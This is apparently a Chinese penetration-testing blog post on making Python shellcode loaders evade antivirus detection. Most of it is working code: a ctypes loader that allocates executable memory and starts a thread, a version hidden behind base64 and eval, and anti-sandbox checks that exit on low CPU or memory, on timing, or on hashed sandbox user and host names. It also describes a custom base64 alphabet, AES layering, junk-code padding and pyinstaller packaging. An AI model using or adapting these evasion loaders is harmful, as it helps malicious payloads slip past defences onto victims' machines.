Python魔改加密免杀
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
参考了几个python免杀得项目,自己也随手来实现一个,用于绕过国内主流杀软检测。
免杀最终效果图
免杀首要的是选取shellcode加载器,一般就是网上搜一篇免杀文章选取相同得加载器即可。
import ctypes
#shellcode加载器
def shellCodeLoad(shellcode):
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
if __name__ == "__main__":
shellCodeLoad(bytearray(b'shellcode'))
测试下效果
很遗憾没有落地就死掉了。
增加一层base64编码尝试
import ctypes
import base64
def shellCodeLoad(shellcode):
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
#ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))
eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
if __name__ == "__main__":
shellCodeLoad(bytearray(b'shellcode'))
依然没有落地,看来这位大哥给得方法已经不太行了,很遗憾白嫖免杀失败得一天。
魔改base64编码序列,编写base64模块修改自定义Base64编码使用的字符集,打乱排序编码规则,不使用python模块自实现base64加解密。
自定义Base64编码使用的字符集后,市面上base64解密无法对其进行解密、
Leetcode拉取一些算法题目作为花指令,参考一些算法题。
对所用shellcode加载器语法进行exec,AES编码,使用魔改base64对shellcode进行编码混淆两次。
加入反沙箱逻辑(可以在github上白嫖开源免杀项目得反沙箱规则,伸手党复制粘贴即可),防止虚拟设备调试运行。
def get_sanbox_users():
users = ["3e93bb7b2887e4881fa7da105c8d95b1893a8373e2e24bee8460dcb69bd3cf04","2cd7b171d2155f0878a5b89ac6fea662241d05e7ef1555452a92006d2a7021f9","7707505e68f824301174b8824a9b9df32605193986fbcb61d0a18d0d28cf9e56","414efb531d1cb23f5778650492d0c7cae356a9633479ef59b1e2169ff9823265","8af67b85a6d66d4c84eb00dc9b4a662a88be1f6339c343f0f27403745ca5fec5","97c27f98cb4a1af26817b4137ef1baab09d6407e423cf1b99997289cc9786c38","14a3ca62b588cf9aa4e9164a4882d66fff67d0a09ba29aeca41b780583901370","cd5f0ac52ead5ad93bb7f732aabf554bf61f8a3070f50b02a91a7b3db99c3205","880473c8b0932cd60b918c0476ad84430739d77f4a01898bb214c842b7d25bd2","01568c005922d1a75fc61738c75c4546870ecc5a5571c83934ccab5ab4156ea8","d06b048d8ab08ee0778dd18bea5fe42b78dcb3bec7b6c57a3f029168e10edcd3","6cf318048779a91ef96bd2cd1ead164c12d1c57e0b2ffc27f4fa184242a960dd","b6ca2c4d97e775b984312c0c383097dd9b8beadbbb5d1f516441a0372b443d38","7f4d76ebe8a027c4d0f198f14971bf09400c9452efca9d458fef22be1b73118d","dcac8e623396c5f9459460209c55435ef52bb16424edf6da136ba84cd2b35982","e831df0ae56afd1a0a086d723e7876a7096428284c2efd40a611c4dece5d226c","9c4c99c53a93995dc9630b1c0b384955a71904c360e8596cef5811a9e45f2b8b","67f6331ef1bd6d094ce49dfdf2e9cd86e636c8aa88a6c9b86c86e9beb4d7f7b","709175a4a328264d72a2e92e16ffa4a6e6eadf72da354e3673f5e27cac92bf63","a0a3531a232f67d10627647ad48d0eb032d4b5dde05bf229cdbd5be6798747b5","6d376cff5c619aa02f76b8742c4b4eedd54ffa2582afedee465d150ba2b0b438","34ac133f0eac7f69b29f86eff4954c739203eaf4855b6c82a201f039268c937e","d3d3e02d666cabb5e26b33de344b5bb08095a1bd73be8201800b56f26ee29d38","1f3dfcc66198c87416e8004e33c932b94cfecac38732dd895e4324add7ab4c91","8a08da7c7ac2a709e019a97699d1a3f920680ad712207d23134426a53f0c95e4","3be0c9573bc4b1e81c26bbb77e00c4d585868fe44dcfce48c5924dea9f2b49ca","5a6e0bd92925b9f91ffec26805eb653f8d5117e8b4813248a87b55765729c0a2","f0b35713f16c4d9cfdbe4dc9b7cc7c8f24676e81cffe1150c8529205a4426d71","19203833e3dc9e0871ee98daa166f8817c2deedc44fd8371a55dc0119003ba5c","71bc0e605d52850557bf58f35f60f4deee63ceb2b2613d36e1a87f1a63483c3e","2da5c4ea837e60abf644c217ed0f360a1221d033b3ef7486ab267dc5ffa31841","dfca1dca8404208458945cc023a905306dc15e4680c0803055210bc71858ecdd","a6687db04a62d5b549b1fb9dbc42af981949aa2349a47ac3cc1128d2839ffe2e"]
return users
def get_sanbox_computers():
computers = ["3e93bb7b2887e4881fa7da105c8d95b1893a8373e2e24bee8460dcb69bd3cf04","2cd7b171d2155f0878a5b89ac6fea662241d05e7ef1555452a92006d2a7021f9","7707505e68f824301174b8824a9b9df32605193986fbcb61d0a18d0d28cf9e56","414efb531d1cb23f5778650492d0c7cae356a9633479ef59b1e2169ff9823265","8af67b85a6d66d4c84eb00dc9b4a662a88be1f6339c343f0f27403745ca5fec5","97c27f98cb4a1af26817b4137ef1baab09d6407e423cf1b99997289cc9786c38","14a3ca62b588cf9aa4e9164a4882d66fff67d0a09ba29aeca41b780583901370","cd5f0ac52ead5ad93bb7f732aabf554bf61f8a3070f50b02a91a7b3db99c3205","880473c8b0932cd60b918c0476ad84430739d77f4a01898bb214c842b7d25bd2","01568c005922d1a75fc61738c75c4546870ecc5a5571c83934ccab5ab4156ea8","d06b048d8ab08ee0778dd18bea5fe42b78dcb3bec7b6c57a3f029168e10edcd3","6cf318048779a91ef96bd2cd1ead164c12d1c57e0b2ffc27f4fa184242a960dd","b6ca2c4d97e775b984312c0c383097dd9b8beadbbb5d1f516441a0372b443d38","7f4d76ebe8a027c4d0f198f14971bf09400c9452efca9d458fef22be1b73118d","dcac8e623396c5f9459460209c55435ef52bb16424edf6da136ba84cd2b35982","e831df0ae56afd1a0a086d723e7876a7096428284c2efd40a611c4dece5d226c","9c4c99c53a93995dc9630b1c0b384955a71904c360e8596cef5811a9e45f2b8b","67f6331ef1bd6d094ce49dfdf2e9cd86e636c8aa88a6c9b86c86e9beb4d7f7b9","709175a4a328264d72a2e92e16ffa4a6e6eadf72da354e3673f5e27cac92bf63","a0a3531a232f67d10627647ad48d0eb032d4b5dde05bf229cdbd5be6798747b5","6d376cff5c619aa02f76b8742c4b4eedd54ffa2582afedee465d150ba2b0b438","34ac133f0eac7f69b29f86eff4954c739203eaf4855b6c82a201f039268c937e","d3d3e02d666cabb5e26b33de344b5bb08095a1bd73be8201800b56f26ee29d38","1f3dfcc66198c87416e8004e33c932b94cfecac38732dd895e4324add7ab4c91","8a08da7c7ac2a709e019a97699d1a3f920680ad712207d23134426a53f0c95e4","3be0c9573bc4b1e81c26bbb77e00c4d585868fe44dcfce48c5924dea9f2b49ca","5a6e0bd92925b9f91ffec26805eb653f8d5117e8b4813248a87b55765729c0a2","f0b35713f16c4d9cfdbe4dc9b7cc7c8f24676e81cffe1150c8529205a4426d71","19203833e3dc9e0871ee98daa166f8817c2deedc44fd8371a55dc0119003ba5c","71bc0e605d52850557bf58f35f60f4deee63ceb2b2613d36e1a87f1a63483c3e","2da5c4ea837e60abf644c217ed0f360a1221d033b3ef7486ab267dc5ffa31841","dfca1dca8404208458945cc023a905306dc15e4680c0803055210bc71858ecdd","a6687db04a62d5b549b1fb9dbc42af981949aa2349a47ac3cc1128d2839ffe2e"]
return computers
def hash_name(i_str: str):
i_str += "CanUGuessMe?"
return sha256(i_str.encode()).hexdigest()
def check_vm():
"""
反沙箱逻辑
"""
total = round(psutil.virtual_memory().total / (1024.0 * 1024.0 * 1024.0), 2)
pre = int(time.time())
user = getuser()
compuer = gethostname()
time.sleep(2)
now = int(time.time())
if now-pre < 2:
exit(1)
if cpu_count() < 3:
exit(0)
if total < 2:
exit(0)
print(hash_name(user),get_sanbox_users())
if hash_name(user) in get_sanbox_users():
exit(0)
if hash_name(compuer) in get_sanbox_computers():
exit(0)
pyinstaller生成exe时,使用upx压缩缩减大小为6.68M,使用python制作免杀文件大小会比较大。
pyinstaller -i teaa.ico -F tesioa.py --noconsole --upx-dir=
原创文章,作者:moonsec,如若转载,请注明出处:https://www.moonsec.com/8141.html